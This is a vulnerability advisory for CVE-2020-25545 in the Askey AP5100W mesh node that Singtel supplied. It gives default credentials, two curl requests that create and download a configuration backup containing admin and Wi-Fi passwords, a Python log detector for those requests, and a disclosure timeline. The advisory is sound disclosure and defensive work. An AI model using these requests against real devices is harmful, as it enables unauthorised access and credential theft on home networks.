Advisories

Askey AP5100W Information Leak through Insecure backups

CVE ID

CVE-2020-25545

Tested Versions

  • Askey AP5100W version Dual_SIG_1.01.071

Product URL(s)

  • https://www.askey.com.tw/

Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.

The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.

Vulnerability

The default login credential of the web interface for the Askey AP5100W is as follows:

  • Login Name: admin
  • Password: admin

Upon successful authentication, an attacker can create a configuration backup with the following command:

curl 'http://IP_ADDR_OF_WEB_INTERFACE/status.cgi?_=1590135633550&service=cfgbackup&act=nvset' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive'

If successful, the response is as follows:

{"nvset":"ok"}

The attacker can then obtain the configuration file (which contains the admin login password, the wifi password, etc.) with:

curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar

In the worst-case scenario, the file can be retrieved regardless of login status: if an admin has backed up the configuration file, the attacker is still able to obtain the admin login password even without authentication.
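
A defender-side detection for the two requests described above, added here as an example and not part of the original advisory: it scans HTTP request logs and flags backup creation and successful downloads of config.tar, separating downloads by a client that never requested the backup itself. The Common Log Format source (for example a proxy or network sensor in front of the node), the sample lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in an assumed Common Log Format; not captured
# from a real device. Addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [22/May/2020:10:00:01 +0800] "GET /status.cgi?_=1590135633550&service=cfgbackup&act=nvset HTTP/1.1" 200 14
192.0.2.10 - - [22/May/2020:10:00:03 +0800] "GET /configs/config.tar HTTP/1.1" 200 20480
192.0.2.77 - - [22/May/2020:11:30:00 +0800] "GET /configs/config.tar HTTP/1.1" 200 20480
192.0.2.10 - - [22/May/2020:11:31:00 +0800] "GET /index.html HTTP/1.1" 200 311
192.0.2.99 - - [22/May/2020:12:00:00 +0800] "GET /configs/config.tar HTTP/1.1" 404 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$')


def find_backup_exposure(log_text):
    """Return (timestamp, client, kind) tuples for requests tied to the backup leak.

    kind is one of:
      backup_created                  - status.cgi called with service=cfgbackup, act=nvset
      backup_downloaded               - config.tar served to the client that created it
      download_without_backup_request - config.tar served to a client that never asked
                                        for a backup (a leftover backup was fetched)
    """
    creators = set()   # clients seen triggering a backup earlier in the log
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue   # skip lines that are not in the assumed format
        client, ts, _method, target, status, _size = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if (url.path == "/status.cgi"
                and query.get("service") == ["cfgbackup"]
                and query.get("act") == ["nvset"]):
            creators.add(client)
            findings.append((ts, client, "backup_created"))
        elif url.path == "/configs/config.tar" and status == "200":
            kind = ("backup_downloaded" if client in creators
                    else "download_without_backup_request")
            findings.append((ts, client, kind))
    return findings


if __name__ == "__main__":
    for finding in find_backup_exposure(SAMPLE_LOG):
        print(*finding)
```

Request logs do not show whether a session was authenticated, so the third category only indicates that the downloading client did not create the backup itself.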

Vendor Response

The vendor did not reply to us despite all the efforts we made.

Timeline

  • 2020-05-22 Reported to Askey, no reply from Askey
  • 2020-05-28 Reported to Askey again, no reply from Askey
  • 2020-06-03 Reported to CSA, CSA replied on same day saying that they will inform Askey and SingTel
  • 2020-06-09 Email to CSA again, CSA replied that SingTel and Askey didn't get back to them.
  • 2020-06-09 Reported to Mitre, but no reply
  • 2020-07-14 Reported to Mitre again, but no reply again.
  • 2020-09-15 Mitre finally replied with CVE

Credit

Discovered by Li Bailin